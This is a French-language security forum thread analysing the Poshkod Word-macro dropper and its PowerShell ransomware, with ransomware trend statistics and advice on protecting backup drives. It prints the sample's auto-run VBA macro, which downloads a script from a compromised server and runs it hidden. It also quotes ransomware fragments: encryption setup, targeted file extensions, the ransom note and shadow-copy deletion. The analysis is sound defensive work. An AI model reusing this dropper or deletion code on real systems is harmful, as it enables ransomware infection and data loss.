Rançongiciels chiffreurs 100% Windows PowerShell

[ѠOOT]

Bonjour,

En février 2015, j'avais abordé Documents XLS malveillants : macros-commandes VBA+PowerShell puis en avril 2015 XLS/DOC malveillants : analyser les flux de documents OLE & CHM malveillants: HTML compilés + ActiveX + PowerShell. Fidèles lecteurs aguerris, achetez donc le MISC #79 (Mai/Juin 2015), vous y trouverez 8 pages complètes sur le sujet avec : "Macros - Le retour de la revanche" (p.20)

Aujourd'hui, j'aborde en douceur sur ce forum, le cas des documents infectés par TrojanDownloader:W97M/Poshkod.

À l'ouverture du document Microsoft Word, une image apparait.
Une technique d'ingénierie sociale qui couvre toutes les versions d'Office.



Le document contient effectivement des macros VBA.



Je procède à l'extraction.

oledump.py -v -s A3 document.docx

Private Declare Function ChangeText Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal wJwjKhfHpGswVwHBTQoJiZWi As Long, ByVal zNjWgEyce As String, _
ByVal KfksiNWWVbxELqDCSVYQpE As String, ByVal xhPRm As String, ByVal OSheMZzzbjvXrW As String, ByVal
vMnM As Long) As Long

Private Declare Function AwlFvmAKttgStPdrYqcg Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal FurlDAWtRXTfjx As Long, ByVal SUeniLcuOic As String, _
ByVal RxGGEJvovZmmBFIAY As String, ByVal ohQ As Long, ByVal yBVyCQb As Long) As Long

Private Sub LdpdbUnkGqBHDOghCDNlRv()
Dim emnxUPtubh As String, AIyeYZXdNUcsTSjYbSsUzxg As String, TpfVkuddPPrzMoHn As String
AIyeYZXdNUcsTSjYbSsUzxg = "chrupdate.ps1"
TpfVkuddPPrzMoHn = "C:\Windows\Temp\chrupdate.ps1"
emnxUPtubh = "http://www.ilaunchmanager.com/x/wp-content/plu ... al/dl2.php"
AwlFvmAKttgStPdrYqcg 0, emnxUPtubh, TpfVkuddPPrzMoHn, 0, 0
End Sub

Private Sub Document_Open()
LdpdbUnkGqBHDOghCDNlRv
Dim Fez As String
Fez = Shell("powershell.exe -nologo -file C:\Windows\Temp\chrupdate.ps1", vbHide)
End Sub

Le fichier "dl2.php" est téléchargé depuis un serveur compromis puis
stocké localement à l'emplacement "C:\Windows\Temp\chrupdate.ps1"
Ce Script PowerShell (ps1) est ensuite exécuté sur la machine.

chrupdate.ps1 n'est autre qu'un rançongiciel chiffreur écrit en Windows PowerShell.

→ New-Object System.Security.Cryptography.RSACryptoServiceProvider(2048)
→ New-Object System.Security.Cryptography.RijndaelManaged

Celui-ci cible tous les fichiers aux extensions suivantes:

*.doc,*.xls,*.docx,*.xlsx,*.mp3,*.waw,*.jpg,*.jpeg,*.txt,*.rtf,*.pdf,*.rar,
*.zip,*.psd,*.tif,*.wma,*.gif,*.bmp,*.ppt,*.pptx,*.docm,*.xlsm,*.pps,*.ppsx,
*.ppd,*.eps,*.png,*.ace,*.djvu,*.tar,*.cdr,*.max,*.wmv,*.avi,*.wav,*.mp4,*.pdd,
*.php,*.aac,*.ac3,*.amf,*.amr,*.dwg,*.dxf,*.accdb,*.mod,*.tax2013,*.tax2014,
*.oga,*.ogg,*.pbf,*.ra,*.raw,*.saf,*.val,*.wave,*.wow,*.wpk,*.3g2,*.3gp,*.3gp2,
*.3mm,*.amx,*.avs,*.bik,*.dir,*.divx,*.dvx,*.evo,*.flv,*.qtq,*.tch,*.rts,
*.rum,*.rv,*.scn,*.srt,*.stx,*.svi,*.swf,*.trp,*.vdo,*.wm,*.wmd,*.wmmp,*.wmx,
*.wvx,*.xvid,*.3d,*.3d4,*.3df8,*.pbs,*.adi,*.ais,*.amu,*.arr,*.bmc,*.bmf,
*.cag,*.cam,*.dng,*.ink,*.jif,*.jiff,*.jpc,*.jpf,*.jpw,*.mag,*.mic,*.mip,
*.msp,*.nav,*.ncd,*.odc,*.odi,*.opf,*.qif,*.qtiq,*.srf,*.xwd,*.abw,*.act,
*.adt,*.aim,*.ans,*.asc,*.ase,*.bdp,*.bdr,*.bib,*.boc,*.crd,*.diz,*.dot,
*.dotm,*.dotx,*.dvi,*.dxe,*.mlx,*.err,*.euc,*.faq,*.fdr,*.fds,*.gthr,*.idx,
*.kwd,*.lp2,*.ltr,*.man,*.mbox,*.msg,*.nfo,*.now,*.odm,*.oft,*.pwi,*.rng,
*.rtx,*.run,*.ssa,*.text,*.unx,*.wbk,*.wsh,*.7z,*.arc,*.ari,*.arj,*.car,
*.cbr,*.cbz,*.gz,*.gzig,*.jgz,*.pak,*.pcv,*.puz,*.r00,*.r01,*.r02,*.r03,
*.rev,*.sdn,*.sen,*.sfs,*.sfx,*.sh,*.shar,*.shr,*.sqx,*.tbz2,*.tg,*.tlz,
*.vsi,*.wad,*.war,*.xpi,*.z02,*.z04,*.zap,*.zipx,*.zoo,*.ipa,*.isu,*.jar,
*.js,*.udf,*.adr,*.ap,*.aro,*.asa,*.ascx,*.ashx,*.asmx,*.asp,*.indd,*.asr,
*.qbb,*.bml,*.cer,*.cms,*.crt,*.dap,*.htm,*.moz,*.svr,*.url,*.wdgt,*.abk,
*.bic,*.big,*.blp,*.bsp,*.cgf,*.chk,*.col,*.cty,*.dem,*.elf,*.ff,*.gam,
*.grf,*.h3m,*.h4r,*.iwd,*.ldb,*.lgp,*.lvl,*.map,*.md3,*.mdl,*.mm6,*.mm7,
*.mm8,*.nds,*.pbp,*.ppf,*.pwf,*.pxp,*.sad,*.sav,*.scm,*.scx,*.sdt,*.spr,
*.sud,*.uax,*.umx,*.unr,*.uop,*.usa,*.usx,*.ut2,*.ut3,*.utc,*.utx,*.uvx,
*.uxx,*.vmf,*.vtf,*.w3g,*.w3x,*.wtd,*.wtf,*.ccd,*.cd,*.cso,*.disk,*.dmg,
*.dvd,*.fcd,*.flp,*.img,*.iso,*.isz,*.md0,*.md1,*.md2,*.mdf,*.mds,*.nrg,
*.nri,*.vcd,*.vhd,*.snp,*.bkf,*.ade,*.adpb,*.dic,*.cch,*.ctt,*.dal,*.ddc,
*.ddcx,*.dex,*.dif,*.dii,*.itdb,*.itl,*.kmz,*.lcd,*.lcf,*.mbx,*.mdn,*.odf,
*.odp,*.ods,*.pab,*.pkb,*.pkh,*.pot,*.potx,*.pptm,*.psa,*.qdf,*.qel,*.rgn,
*.rrt,*.rsw,*.rte,*.sdb,*.sdc,*.sds,*.sql,*.stt,*.t01,*.t03,*.t05,*.tcx,
*.thmx,*.txd,*.txf,*.upoi,*.vmt,*.wks,*.wmdb,*.xl,*.xlc,*.xlr,*.xlsb,*.xltx,
*.ltm,*.xlwx,*.mcd,*.cap,*.cc,*.cod,*.cp,*.cpp,*.cs,*.csi,*.dcp,*.dcu,*.dev,
*.dob,*.dox,*.dpk,*.dpl,*.dpr,*.dsk,*.dsp,*.eql,*.ex,*.f90,*.fla,*.for,*.fpp,
*.jav,*.java,*.lbi,*.owl,*.pl,*.plc,*.pli,*.pm,*.res,*.rsrc,*.so,*.swd,*.tpu,
*.tpx,*.tu,*.tur,*.vc,*.yab,*.8ba,*.8bc,*.8be,*.8bf,*.8bi8,*.bi8,*.8bl,*.8bs,
*.8bx,*.8by,*.8li,*.aip,*.amxx,*.ape,*.api,*.mxp,*.oxt,*.qpx,*.qtr,*.xla,
*.xlam,*.xll,*.xlv,*.xpt,*.cfg,*.cwf,*.dbb,*.slt,*.bp2,*.bp3,*.bpl,*.clr,*.dbx,
*.jc,*.potm,*.ppsm,*.prc,*.prt,*.shw,*.std,*.ver,*.wpl,*.xlm,*.yps,*.md3,*.1cd

Les consignes habituelles sont dans une page nommée "DECRYPT_INSTRUCTION.html"
<title>Your files were encrypted!</title><h2>Your files were encrypted and locked with a RSA2048 key</h2><p>To decrypt your files:<br> Download the Tor browser <a href="https://www.torproject.org/download/dow ... n">here</a> and go to <b>http://rq4ul32ph34j2ghn.onion</b> within the browser.<br>Follow the instructions and you will receive the decrypter within 12 hours.<br>You have ten days to obtain the decrypter before the price to obtain the decrypter is doubled. Scheduled deletion of the private key from our server is after 30 days - leaving your files irrevocably broken.<br>Your ID is <b>...</b>

Les limites de temps sont effectives comme nous pouvons le constater.
Add-Content -Path $page -Value ('<p><b>Guaranteed recovery is provided before scheduled deletion of private key on the day of '+(Get-Date).AddDays(+30))
Add-Content -Path $page -Value ('<p><b>The price to obtain the decrypter goes from 1BTC to 2BTC on the day of '+(Get-Date).AddDays(+10))

Enfin notons la requête WMI pour manipuler VSS.
$vss = Get-WmiObject Win32_ShadowCopy
ForEach($item in $TgxmcjKzhsjdtYd) {$item.Delete()

Il faut savoir que PowerShell existe depuis dix ans déjà ! Certains parcs de machines Microsoft Windows sont quasiment entièrement administrés / pilotés via PowerShell. Cela illustre la puissance lorsqu'il est utilisé dans des mains experts ( administrateurs ou pirates informatiques ). D'ailleurs, ce n'est pas un hasard si metasploit l'a si rapidement adopté. Avec le retour inattendu des macros c'est "Back to the old-school" et donc pourquoi pas un retour des vers informatiques. Espérons que le phénomène ne se généralise pas car d'ici à ce que les criminels se mettent en tête de véhiculer leurs rançongiciels via vos réseaux, il n'y a qu'un pas.

[ѠOOT]

Bonjour,

Qu'est-ce que le Ransom:PowerShell/Poshkod.D ?

Il s'agit d'un PE 32-bits, d'un poids d'~ 212 Ko, écrit en Microsoft .NET, compilé le samedi 9 mai 2015. La librairie ScriptRunner.dll v3.8.0.129 de PowerGUI ainsi que la librairie légère gzippée de Ionic's Zip du projet DotNetZip v1.9.1.5 sont utilisées. Plusieurs éléments sont situés en ressources, notamment le fichier "Posh2.config" au format XML. C'est d'ailleurs probablement à l'origine du nom "PowerShell/Poshkod". La variable ScriptRunnerSettings.FileName pointe sur le nom de fichier "crypter.ps1" et celui-ci est contenu dans l'archive embarquée "scripts.zip". Le script n'est pas camouflé davantage ce qui facilite les détections.



Ce rançongiciel chiffreur écrit en PowerShell est similaire à celui déjà observé.
Mais détail "amusant", le prix a augmenté : de 1BTC à 2BTC & de 2BTC à 4BTC.

Fiche de la menace TrojanDownloader:W97M/Poshkod sur le portail Microsoft.

Alert level: Severe
First detected by definition: 1.197.2705.0
First detected on: May 16, 2015
This entry was first published on: May 19, 2015

Les documents forgés par les attaquants s'inspirent de techniques connues.
Comme souvent, tout est question de "bons" & de "méchants". Et de business.
Pour comprendre & anticiper les menaces, il suffit parfois de regarder dans le passé.
Ci-dessous, quelques liens sélectionnés en relations avec PowerShell + aspects offensifs.

[2012] PowerShell as an attack platform

[2013] Native PowerShell x86 Shellcode Injection on 64-bit Platforms
⚙ Magic Unicorn

[2014] I have the POWER(shell)

[2014] PowerShell Weaponization
[2014] PowerShell & Win32 API Access
[2014] PowerShell & Mimikatz
[2014] Mining a Domain's Worth of Data With PowerShell
[2015] Invoke-BypassUAC

[2014] PowerUp: A Usage Guide
⚙ PowerUp

[2014] Veil PowerView: A Usage Guide
[2015] Introducing a new language into the Veil-Framework for bypassing AntiVirus
⚙ Veil-Framework / Veil-Catapult

[2015] Interactive PowerShell session via metasploit
[2015] Bring Your Metasploit Exploits to Life with PowerShell

⚙ PowerSploit

⚙ PowerShell Empire

[2014] (vidéo) Shmoocon : AntiVirus Evasion With The Veil Framework
[2014] (slides) AntiVirus Evasion With The Veil Framework
[2014] BlackHat US 2014 Schroeder The Veil-Framework Slides
[2014] DEFCON #22 : Will Schroeder Veil-Pillage Post-Exploitation 2.0

[2015] PowerShell Post-Exploitation Tools

[2015] Blue Team Ninja & Logoholic how we do it better than IR firms
[2015] Enable & Configure your logs! The Windows Logging Cheat Sheet
⚙ Nishang
* Stream a target's Desktop using MJPEG and PowerShell

[2015] Direct running PowerShell inside a Virtual-Machine from the Hyper-V host

C'est également le Week of PowerShell Shells
* Day 1 - Interactive PowerShell shells over TCP
* Day 2 - Interactive PowerShell shells over UDP
* Day 3 - Interactive PowerShell shells over HTTP/HTTPS
* Day 4 - Interactive PowerShell shells with WMI
* Day 5 - Interactive PowerShell shells over ICMP and DNS

Si vous lisez ces articles, vous comprendrez rapidement qu'il est question de venter, entre autre, l'usage de PowerShell pour saucer ses frappes informatiques. Il semble que ça soit cool de jouer à la "Weaponization" en tout genre. Au cas où vous l'ignoriez, oui.. un tas de sociétés cèdent / vendent des solutions dédiées à l'établissement d'un "armement numérique". Des exploits aux contournements des actuelles protections du marché ( AntiVirus, FireWall, etc.. ) tout ceci n'a jamais été aussi simple et ça n'ira pas en s'arrangeant. Remercions donc les auteurs de ces supers frameworks d'avoir énormément simplifié la tâche aux skiddies.

Au passage, si vous allez à Hack In Paris les 16 & 17 Juin 2015, vous y trouverez un camps d'entrainement sur la thématique PowerShell for penetration testers.

Liens connexes:
➱ ( August 15, 2014 ) ❴ Rapport FireEye - Investigating PowerShell attacks ❵
➱ ( September 18, 2015 ) ❴ PowerShell Memory Scraping for Credit Cards ❵
➱ ( October 12, 2015 ) ❴ The rise of .NET & Powershell malware ❵
➱ ( November 12, 2015 ) ❴ FuzzySecurity/PowerShell-Suite: My musings with PowerShell ❵

[Malekal_morte]

Oui et surement bientôt les premières malwares autorun en PowerShell.
Ca va être bien...

[ѠOOT]

Bonjour,

C'est déjà le cas, Malekal.

En début d'année 2015, les infections par rançongiciels ré-augmentent.
Mauvaise nouvelle, les infections par rançongiciels chiffreurs explosent.



Les victimes de POWELIKS occupent largement le haut des statistiques.



POWELIKS tient son nom de l'usage de Windows PowerShell. Ce maliciel utilise des mécanismes originaux pour se maintenir "alive" au sein d'un système hôte infecté. Par exemple, en stockant une librairie malveillante encodée dans le Registre Windows. Ce "fileless malware" ne s'exécute qu'en mémoire vive : il n'y a "pas" ( pas directement ) d'écriture sur le support de stockage. ( Abusing Windows Management Instrumentation WMI to build a persistent asynchronous & fileless backdoor )



Les GE sont durement impactées par les infections de rançongiciels, ↗ de 16% à 28% & les TPE/PME ↗ de 6% à 14%. A l'inverse, les particuliers le sont moins que l'année précédente, ↘ de 75% à 52%.



Ces graphiques sont extraits de l'article "Crypto-Ransomware Infection Volume Soared, Threatened Enterprises" situé en page 11/50 du rapport "TrendLabs 1Q 2015 Security Roundup" publié le 8 mai 2015 par l'éditeur Trend Micro.

James Moar de la société d'études Juniper Research indiquait récemment que le coût des violations des données à l'échelle mondiale pourrait atteindre d'ici 2019 la somme de 2100 milliards de dollars USD pour les entreprises. Ce chiffre astronomique est à prendre avec une extrême prudence puisqu'il s'agit d'une pure estimation cependant comme à chaque fois, il a fait les grands titres de tous les médias. J'ai souligné un point interessant soulevé par James Moar : "Les mobiles et objets connectés ( IoT – Internet des objets) sont menacés mais pour l'heure le nombre d'appareils compromis est encore minime. Pour combien de temps ? En effet, il est à craindre que les malwares que nous connaissons ne soient plus assez lucratifs ce qui va les pousser à créer d'autres solutions ciblant davantage le marché des terminaux et applications mobiles. D'après lui, il s'agira essentiellement de botnets & de rançongiciels. ( source: Cybercrime : un coût de 2100 milliards de dollars pour les entreprises d'ici 2019 + Android ransomware)

On assiste également à d'autres changements en profondeur. Le dernier rapport ThreatMetrix relève une augmentation des attaques complexes contre les entreprises. La France fait partie du top 5 des pays les plus ciblés par des cyberattaques locales. Les actes malveillants ( subversions, sabotages,.. ) proviennent de là où finalement on s'y attends le moins. ( source: Le cybercrime « Made in France » monte en puissance )

Je vous invite à lire ce rapport et comme d'habitude... à prendre pleinement conscience des enjeux.
Les rançongiciels peuvent sérieusement nuire voir détruire des emplois, y compris des entreprises.
Réagissez, il n'est pas trop tard pour adopter les mesures necessaires pour préserver vos intérêts.

Liens connexes:
➱ ( Feb 4, 2015 ) ❴ Trends for 2015 - TARGETING THE CORPORATE WORLD ❵
➱ ( May 21, 2015 ) ❴ Why ransomware will rise in 2015 ❵
➱ ( May 23, 2015 ) ❴ Tox : Ransomware-As-S-Service using the Crypto++ lib, leverages TOR + Bitcoin ❵

[Malekal_morte]

yep POWERLIKS
ca va pas aller en s'arrangeant le PowerShell, c'est trop pratique.

[dualpax]

Bonjour,je voudrait poser une question,dans le cas Rançongiciels chiffreurs, dans le cas ou le système et sur C et que les fichiers de sauvegardes et autres documents sont sur un autre disque , que se passe il , tout et chiffrer ou seulement le disque C.
je vous remercie d'avance.

[ѠOOT]

Bonjour,

C'est une question qui revient souvent sur ce sujet. Difficile de généraliser car les rançongiciels chiffreurs peuvent être bien différents mais dans l'ensemble ils prennent en otage tout ce qui est et sera à "portée". Il y a exposition dès lors qu'une mémoire de masse est accessible en lecture / écriture, que ce soit un disque dur ou tout ce qui est de type mémoires flash ( clés USB, cartes mémoire, appareils photo numériques, baladeurs numériques,.. ) ainsi que les ressources accessibles en réseaux. Dans le but d'aller infecter d'autres machines, certains rançongiciels peuvent se dupliquer à l'insertion de supports amovibles.

Si votre disque dur de sauvegarde est "branché" en permanence et accessible en lecture / écriture depuis Microsoft Windows alors il est clairement exposé. Si vous avez un système de gestion de fichiers en NTFS, vous pouvez toujours définir des ACL pour appliquer des droits / restrictions. Là encore, à vos risques et périls car si le code malveillant est capable de s'octroyer les droits, ça n'aura pas servi à grand chose. Si le disque est partitionné avec le même système de fichiers même chose. Enfin pour ceux qui utilisent un boîtier / rack avec leurs disques dans le cas où la machine est déjà infectée, au premier branchement à chaud, ils seront tout autant exposés.

Définir les bonnes méthodes de stockage en fonction de ses besoins n'est pas chose aisée & ça demande du temps. Heureusement pour les néophytes, il existe des solutions simplifiées pour particuliers / professionnels qui offrent de nombreux avantages ( permissions, horaires, quotas, droits d'accès, redondances, chiffrages, sauvegardes,.. ) dès lors qu'elles sont bien configurées. Je pense notamment aux NAS / SAN dont les couts sont évidemment supérieurs aux serveurs de fichiers mitonnés aux petits oignons mais.. pour du clef en main, c'est très bien. Maintenant si vous n'avez que quelques fichiers importants ici & là, vous pouvez toujours songer à les dématérialiser, et encore une fois, tout en prenant quelques précautions ;)

Si vous avez d'autres interrogations, n'hésitez pas.